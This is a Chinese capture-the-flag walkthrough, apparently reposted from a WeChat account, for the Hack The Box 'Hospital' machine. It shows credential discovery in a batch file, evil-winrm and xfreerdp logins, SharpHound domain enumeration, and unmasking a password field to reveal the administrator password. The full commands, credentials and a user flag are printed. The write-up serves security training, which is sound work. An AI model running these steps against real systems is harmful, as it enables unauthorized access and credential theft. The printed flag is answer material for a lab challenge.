发送邮件getshell后,可以发现底下有个ghostscript.bat,查看他是一连串的ps命令,其中密码就在里面
用户是drbrown,密码是chr!$br0wn,使用crackmapexec进行枚举一下
直接evil-winrm登录,拿到user flag:
ef9e6c0dc3c2d80a6df9f055a9ee09de
evil-winrm -i 10.10.11.241 -u drbrown -p 'chr!$br0wn'
上传SharpHound获得AD信息,收集一波
Import-Module .SharpHound.ps1; Invoke-BloodHound -CollectionMethods All
从上面的bloodhuound看,有一些是域渗透知识,之前nmap扫描到了3389端口,尝试直接拿drbrown用户登录一下
xfreerdp /v:hospital.htb /u:'drbrown' /p:'chr!$br0wn' /d:"dc.hospital.htb"
登录进去后,你可以看到他正在一个字母的慢慢的,修改前端password参数 ,打开后台,修改password的type,将password修改成text文本格式,这样就可以看到明文Th3B3stH0sp1t4l9786!,使用crackmapexec枚举,建议使用xfreerdp工具,使用remmina可能登录不了
看来可以直接winrm登录,直接拿root flag
evil-winrm -i 10.10.11.241 -u Administrator -p 'Th3B3stH0sp1t4l9786!'
原文始发于微信公众号(Jiyou too beautiful):HTB-Hospital笔记-第二种拿root flag
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论